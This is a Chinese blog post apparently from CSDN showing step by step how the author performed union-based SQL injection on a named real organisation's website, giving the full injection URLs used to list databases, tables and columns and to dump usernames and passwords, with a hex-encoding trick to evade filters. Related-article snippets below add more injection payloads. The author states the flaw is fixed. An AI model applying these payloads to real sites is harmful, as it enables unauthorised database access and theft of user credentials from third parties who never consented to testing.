简单的SQL注入某社会组织

最新推荐文章于 2022-07-27 09:13:23 发布
最新推荐文章于 2022-07-27 09:13:23 发布
阅读量813 收藏
点赞数
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nightsay/article/details/42134723
版权

好早之前的网站了,漏洞已经被填上了,请大家不要尝试!

目标:http://www.qdmjzz.org/

1、首先是拆解:http://www.qdmjzz.org/show.php?id=7829 and 1=2 union select 1,2,3,4,5,6,7-- 这样一直找到正确的列数 也可以直接用order by 后面接数,表示有多少行。这样就可以猜到共有19行。
发现可以回显的是3,4,13.在这些位置我们可以使用函数来回显数据库里面的数据。

2、查询数据库和表:http://www.qdmjzz.org/show.php?id=7829%20and%201=2%20union%20select%201,2,database%28%29,group_concat%28schema_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20information_schema.SCHEMATA--
出现内容如下:



3、查询摸表中有多少项:http://www.qdmjzz.org/show.php?id=7829%20and%201=2%20union%20select%201,2,database%28%29,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20information_schema.tables%20where%20table_schema=database%28%29--

4、查询某一张表有哪些字段:http://www.qdmjzz.org/show.php?id=7829%20and%201=2%20union%20select%201,2,database%28%29,group_concat%28column_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20information_schema.columns%20where%20table_name=0x7573657273--



注意最后的users转换成16进制,绕过对字符的过滤。

5、查询每一个字段的内容:http://www.qdmjzz.org/show.php?id=7829%20and%201=2%20union%20select%201,2,passwd,name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20users



当让这样只是得到一个数据而已,如果想要将所有用户名密码都爆出,群里面的一位女士给出的答案:用group_concat(name),group_concat(passwd)。这样就可以回显了。




Nightsay
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL 注入语句。。
我多么希望明天有太阳,来灼烧我腐烂的梦想
11-03 888
1 判断:and 1=1 and 1=2 2  爆字段数 order by x 3  and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 操作系统信息: and 1=2 union all select @@global.version_compile_os from mysql.user /* 数据库权限: and
Mysql注入 -- 联合注入
weixin_41489908的博客
05-12 440
得到一个像原来老师一样督促你、关心你的人很难。。。 ​---- 网易云热评 一、常用命令及函数 1、orderby排序,获取数据有几个字段,后面小于等于字段数,都会返回结果,大于字段数返回错误 select * from users order by 3; 2、unionselect联合查询,后边必须跟一样的字段数 select * from users union select 1,2,5; 3、user()查看当前mysql用户 4、version()查看mysql版...
Union注入攻击
qq_53365842的博客
04-21 1998
1.判断注入点 主要是判断两个条件 1.我们传入的参数是否可控 2.我们传入的参数能否在数据库执行 ?id=1' ?id=1' and 1=1 --+ ?id=1' and 1=2 --+ 尝试单引号注入,发现报错信息 http://192.168.183.150:8081/Less-1/?id=1%27 将单引号闭合后,页面返回正常 http://192.168.183.150:8081/Less-1/?id=1%27%20and%201=1%20--+ 2.查询字段 判断字段个数 ?id=1
asp sql查询字段 过滤空格_这可能是最全的SQL注入总结,很有用
weixin_39869959的博客
10-26 465
SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入的分类按变量类型分:数字型和字符型按HTTP提交方式分:POST注入、GET注入和Cookie注入按注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入按数据库类型分:sql:oracle、mysql、mssql、access、sq...
SQL注入的一些命令
jkhdjkasd的博客
07-27 1693
sqlmap的常用命令
简单sql注入问题
12-30
sql注入问题:sql的特殊关键字与字符串拼接。会造成安全性的问题 1输入名随便,输入密码:a’ or ‘a’=’a sql:select* from user where username=‘123’ and password=‘a’ or ‘a’=‘a’ ** // 1.获取链接 ...
mysql,sql注入简单测试了解
最新发布
08-31
SQL注入是一种常见的网络安全漏洞,它发生在应用程序不恰当地构建SQL查询时,允许攻击者通过输入恶意数据来操纵数据库。在上述描述中,我们看到两种基本的SQL注入技术:利用注释符号和分解查询条件。 首先,让我们...
sql注入讲解ppt.pptx
08-10
4. 操作方便:SQL 注入攻击可以通过简单的输入来实现,攻击者可以使用自动化工具来快速实现攻击。 二、SQL 注入基础知识: 1. PHP 语言基础:了解 PHP 语言的基础知识,熟悉 MySQL 的一些函数和语句。 2. MySQL ...
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
SQL注入(一)
_Ralph的博客
01-16 1091
SQL注入(一) 定义: 就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行的sql命令的目的。   sql注入分类: 基于联合查询,基于错误回显,基于盲注,基于user-agent,基于feferer,基于cookie,二次注入,宽字节注入 (基于user-agent,基于feferer,基于cookie可以算请求头注
挖洞入门_union型SQL注入
c4y345的博客
06-21 936
简介:在漏洞盒子挖洞已经有一段时间了,虽说还不是大佬,但技术也有所进步,安全行业就是这样,只有自己动手去做,才能将理论的知识变为个人的经验。本篇文章打算分享一下我在挖显错型SQL注入漏洞过程中的一些个人理解,如有不足也请大佬不吝指教。 0x00:什么是SQL注入 SQL注入,相信大多数人一开始接触安全,听说的第一种漏洞类型就会是SQL注入,众所周知,其本质就是将用户输入的数据当成了SQL语句来执行。 开发过网站的朋友应该都清楚,大多数的小型企业或个人的站点大都采用了LAMP结构,即Linux + Apach
为什么sql注入的时候会写union select 1,2~~~~~from admin
被遗弃的庸才博客
04-15 1万+
我也是最近好奇才去学了一点web渗透的知识。在这之前还是需要一定的数据库的相关知识。这里假设知道当前表有多少列(这里设置为10),也可以直接通过order by直接测试出来。union 是联和查询的一个关键字,这个有一个前提就是必须满足所有的列是相同的,所以在这前面必须要添加一些没有意义的列来作为填充。这里给一个网站大家可以去看看,我忘记是在哪里看到了,反正可以用。http://www.joesd...
SQL注入——联合注入
初见辉少
07-12 988
SQL注入原理:攻击者通过构造不同的SQL语句来实现对数据库的操作 SQL注入的本质:我们也能操作别人的数据库 数据库结构:库:就是一堆表组成的数据集合 表:类似Excel,有行和列组成的二维表 字段:表中的列称为字段 记录:表中的行称为记录 单元格:行和列相交的地方成为单元格 在数据库里有一个系统库:information_schema 在他里面有个存放所有库名的表:schemata schema_name 库名 ...
sql注入-union select
我不是大牛
06-24 2万+
什么是SQL注入 SQL注入(Sql Injection ) 是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击 这些参数传递给后台的SQL数据库服务器加以解析并执行 哪里存在SQL注入? GET POST HTTP头部注入 Cookie注入 任何客户端可控,传递到服务器的变量,并且和数据库进行交互,都有可能存在sql注入SQL注入的分类 根据SQL数据类型分类 整型注...
还在select 1 union select 2 union……?
Sevan_Li的博客
08-23 637
用Union? 试试values
SQL注入--MySql
pygain的博客
10-04 936
通过联合查询注入的注入方法,查询information_schema(信息数据库),保存着关于Mysql服务器维护的所有其他的数据库的信息
sql注入原理
oxygensss的博客
12-01 447
SQL注入原理; 用户输入的数字被当作代码执行 在URL栏中进行手注 unoin select 1,2,3 //如果页面回显正常,则说明输出的为3个字段 页面回显正常 and 1=2 union select 1,2 页面回显2 如果要输出字符串 要在前面加单引号 数据库里面的东西不一定全部输出,数据库会有选择的输出,根据某些设定,根据开发的需求所决定 and 1=2 select union select 1,database() database() 可以找出数据库 这样就找到了库名 m
南邮ctf平台部分题解
热门推荐
xuqi7
06-11 2万+
南邮ctf平台部分wp
SQL注入攻击技术详解
"SQL注入实战教程,涵盖ACCESS、MySQL、SQL SERVER和ORACLE的注入技巧,由讲师闵海钊讲解,内容包括注入点检测、表名和列名的猜解、长度判断等。" SQL注入是一种常见的网络安全攻击手段,攻击者通过在Web应用的输入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值